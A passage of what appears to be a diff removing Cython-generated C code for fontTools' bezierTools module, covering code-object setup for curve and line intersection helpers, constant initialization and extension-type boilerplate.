CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__75, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_line_t_of_pt, 1127, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__76)) __PYX_ERR(0, 1127, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - __pyx_tuple__77 = PyTuple_Pack(5, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_origin, __pyx_n_s_xDiff, __pyx_n_s_yDiff); if (unlikely(!__pyx_tuple__77)) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__77); - __Pyx_GIVEREF(__pyx_tuple__77); - __pyx_codeobj__78 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__77, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_both_points_are_on_same_side_of, 1141, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__78)) __PYX_ERR(0, 1141, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def 
lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - __pyx_tuple__79 = PyTuple_Pack(17, __pyx_n_s_s1, __pyx_n_s_e1, __pyx_n_s_s2, __pyx_n_s_e2, __pyx_n_s_s1x, __pyx_n_s_s1y, __pyx_n_s_e1x, __pyx_n_s_e1y, __pyx_n_s_s2x, __pyx_n_s_s2y, __pyx_n_s_e2x, __pyx_n_s_e2y, __pyx_n_s_x, __pyx_n_s_slope34, __pyx_n_s_y, __pyx_n_s_pt, __pyx_n_s_slope12); if (unlikely(!__pyx_tuple__79)) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__79); - __Pyx_GIVEREF(__pyx_tuple__79); - __pyx_codeobj__80 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 17, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__79, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_lineLineIntersections, 1147, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__80)) __PYX_ERR(0, 1147, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. 
Apply this transformation to curves and root-find to find - */ - __pyx_tuple__81 = PyTuple_Pack(4, __pyx_n_s_segment, __pyx_n_s_start, __pyx_n_s_end, __pyx_n_s_angle); if (unlikely(!__pyx_tuple__81)) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__81); - __Pyx_GIVEREF(__pyx_tuple__81); - __pyx_codeobj__82 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__81, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_alignment_transformation, 1225, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__82)) __PYX_ERR(0, 1225, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - __pyx_tuple__83 = PyTuple_Pack(10, __pyx_n_s_curve, __pyx_n_s_line, __pyx_n_s_aligned_curve, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_intersections, __pyx_n_s_d, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__83)) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__83); - __Pyx_GIVEREF(__pyx_tuple__83); - __pyx_codeobj__84 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__83, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_line_intersections_t, 1235, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__84)) __PYX_ERR(0, 1235, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. 
- * - */ - __pyx_tuple__85 = PyTuple_Pack(7, __pyx_n_s_curve, __pyx_n_s_line, __pyx_n_s_pointFinder, __pyx_n_s_intersections, __pyx_n_s_t, __pyx_n_s_pt, __pyx_n_s_line_t); if (unlikely(!__pyx_tuple__85)) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__85); - __Pyx_GIVEREF(__pyx_tuple__85); - __pyx_codeobj__86 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__85, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curveLineIntersections, 1248, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__86)) __PYX_ERR(0, 1248, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - __pyx_tuple__87 = PyTuple_Pack(1, __pyx_n_s_c); if (unlikely(!__pyx_tuple__87)) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__87); - __Pyx_GIVEREF(__pyx_tuple__87); - __pyx_codeobj__88 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__87, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_bounds, 1286, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__88)) __PYX_ERR(0, 1286, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - __pyx_tuple__89 = PyTuple_Pack(5, __pyx_n_s_c, __pyx_n_s_t, __pyx_n_s_s, __pyx_n_s_e, __pyx_n_s_midpoint); if (unlikely(!__pyx_tuple__89)) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__89); - __Pyx_GIVEREF(__pyx_tuple__89); - __pyx_codeobj__90 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__89, __pyx_empty_tuple, __pyx_empty_tuple, 
__pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_split_segment_at_t, 1294, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__90)) __PYX_ERR(0, 1294, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - __pyx_tuple__92 = PyTuple_Pack(25, __pyx_n_s_curve1, __pyx_n_s_curve2, __pyx_n_s_precision, __pyx_n_s_range1, __pyx_n_s_range2, __pyx_n_s_bounds1, __pyx_n_s_bounds2, __pyx_n_s_intersects, __pyx_n_s__91, __pyx_n_s_midpoint, __pyx_n_s_midpoint, __pyx_n_s_c11, __pyx_n_s_c12, __pyx_n_s_c11_range, __pyx_n_s_c12_range, __pyx_n_s_c21, __pyx_n_s_c22, __pyx_n_s_c21_range, __pyx_n_s_c22_range, __pyx_n_s_found, __pyx_n_s_unique_key, __pyx_n_s_seen, __pyx_n_s_unique_values, __pyx_n_s_ts, __pyx_n_s_key); if (unlikely(!__pyx_tuple__92)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__92); - __Pyx_GIVEREF(__pyx_tuple__92); - __pyx_codeobj__93 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 25, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__92, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_curve_intersections_t, 1306, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__93)) __PYX_ERR(0, 1306, __pyx_L1_error) - __pyx_tuple__94 = PyTuple_Pack(3, ((PyObject*)__pyx_float_1eneg_3), Py_None, Py_None); if (unlikely(!__pyx_tuple__94)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__94); - __Pyx_GIVEREF(__pyx_tuple__94); - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. 
- * - */ - __pyx_tuple__95 = PyTuple_Pack(4, __pyx_n_s_curve1, __pyx_n_s_curve2, __pyx_n_s_intersection_ts, __pyx_n_s_ts); if (unlikely(!__pyx_tuple__95)) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__95); - __Pyx_GIVEREF(__pyx_tuple__95); - __pyx_codeobj__96 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__95, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curveCurveIntersections, 1373, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__96)) __PYX_ERR(0, 1373, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - __pyx_tuple__97 = PyTuple_Pack(5, __pyx_n_s_seg1, __pyx_n_s_seg2, __pyx_n_s_swapped, __pyx_n_s_intersections, __pyx_n_s_i); if (unlikely(!__pyx_tuple__97)) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__97); - __Pyx_GIVEREF(__pyx_tuple__97); - __pyx_codeobj__98 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__97, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentSegmentIntersections, 1401, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__98)) __PYX_ERR(0, 1401, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - __pyx_tuple__99 = PyTuple_Pack(4, __pyx_n_s_obj, __pyx_n_s_it, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__99)) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__99); - __Pyx_GIVEREF(__pyx_tuple__99); - __pyx_codeobj__100 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, 
__pyx_empty_tuple, __pyx_tuple__99, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentrepr, 1449, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__100)) __PYX_ERR(0, 1449, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - __pyx_tuple__101 = PyTuple_Pack(2, __pyx_n_s_segments, __pyx_n_s_segment); if (unlikely(!__pyx_tuple__101)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__101); - __Pyx_GIVEREF(__pyx_tuple__101); - __pyx_codeobj__102 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__101, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_printSegments, 1462, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__102)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_RefNannyFinishContext(); - return 0; - __pyx_L1_error:; - __Pyx_RefNannyFinishContext(); - return -1; -} -/* #### Code section: init_constants ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { - if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); - __pyx_float_0_0 = PyFloat_FromDouble(0.0); if (unlikely(!__pyx_float_0_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_5 = PyFloat_FromDouble(0.5); if (unlikely(!__pyx_float_0_5)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1_0 = PyFloat_FromDouble(1.0); if (unlikely(!__pyx_float_1_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_2_0 = PyFloat_FromDouble(2.0); if (unlikely(!__pyx_float_2_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_3_0 = PyFloat_FromDouble(3.0); if (unlikely(!__pyx_float_3_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_4_0 = PyFloat_FromDouble(4.0); if (unlikely(!__pyx_float_4_0)) __PYX_ERR(0, 1, __pyx_L1_error) - 
__pyx_float_9_0 = PyFloat_FromDouble(9.0); if (unlikely(!__pyx_float_9_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1eneg_3 = PyFloat_FromDouble(1e-3); if (unlikely(!__pyx_float_1eneg_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_27_0 = PyFloat_FromDouble(27.0); if (unlikely(!__pyx_float_27_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_54_0 = PyFloat_FromDouble(54.0); if (unlikely(!__pyx_float_54_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_005 = PyFloat_FromDouble(0.005); if (unlikely(!__pyx_float_0_005)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_125 = PyFloat_FromDouble(0.125); if (unlikely(!__pyx_float_0_125)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1eneg_10 = PyFloat_FromDouble(1e-10); if (unlikely(!__pyx_float_1eneg_10)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_neg_2_0 = PyFloat_FromDouble(-2.0); if (unlikely(!__pyx_float_neg_2_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_2 = PyInt_FromLong(2); if (unlikely(!__pyx_int_2)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_6 = PyInt_FromLong(6); if (unlikely(!__pyx_int_6)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) - return 0; - __pyx_L1_error:; - return -1; -} -/* #### Code section: init_globals ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { - return 0; -} -/* #### Code section: init_module ### */ - -static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ -static CYTHON_SMALL_CODE int 
__Pyx_modinit_type_init_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ - -static int __Pyx_modinit_global_init_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); - /*--- Global init code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_variable_export_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); - /*--- Variable export code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_function_export_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); - /*--- Function export code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_type_init_code(void) { - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); - /*--- Type init code ---*/ - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)) __PYX_ERR(0, 546, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) < 0) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = 
&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) < 0) __PYX_ERR(0, 546, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)) __PYX_ERR(0, 583, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_print = 0; - #endif - #if 
!CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)) __PYX_ERR(0, 637, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_getattro == PyObject_GenericGetAttr)) { - 
__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)) __PYX_ERR(0, 763, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, 
&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)) __PYX_ERR(0, 1245, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) < 0) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) < 0) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)) __PYX_ERR(0, 1306, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec, 
